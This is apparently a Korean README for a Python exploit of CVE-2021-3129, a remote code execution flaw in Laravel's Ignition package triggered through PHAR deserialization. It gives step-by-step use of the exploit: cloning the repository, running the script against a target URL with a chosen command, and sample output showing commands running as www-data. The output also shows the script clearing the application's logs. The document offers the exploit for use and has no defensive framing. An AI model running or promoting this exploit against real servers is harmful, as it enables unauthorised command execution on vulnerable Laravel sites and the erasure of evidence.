
# CVE-2021-3129용 Python 익스플로잇 취약한 Laravel Ignition 엔드포인트에서 임의 명령을 실행하기 위해 PHAR 역직렬화를 자동화하는 Python 익스플로잇입니다.
이것은 Laravel에 Ignition 패키지가 설치된 경우 발생하는 원격 코드 실행 취약점(CVE-2021-3129)을 위한 Python 익스플로잇 스크립트입니다. 이 취약점을 통해 공격자는 PHAR 역직렬화를 통해 임의의 시스템 명령을 실행할 수 있습니다.
phpggc를 사용하여 PHAR 페이로드를 자동으로 생성id, whoami 등)를 사용자 입력으로 받음requests 라이브러리저장소를 클론합니다:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
필요한 Python 패키지를 설치합니다:
pip install requests
원하는 대상과 명령어로 스크립트를 실행합니다:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
예제 출력:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (필수): 취약한 Laravel 애플리케이션의 URL--cmd (선택): 대상에서 실행할 명령어 (기본값: whoami)--log_path (선택): 사용할 로그 파일 경로 (기본값: ../storage/logs/laravel.log)
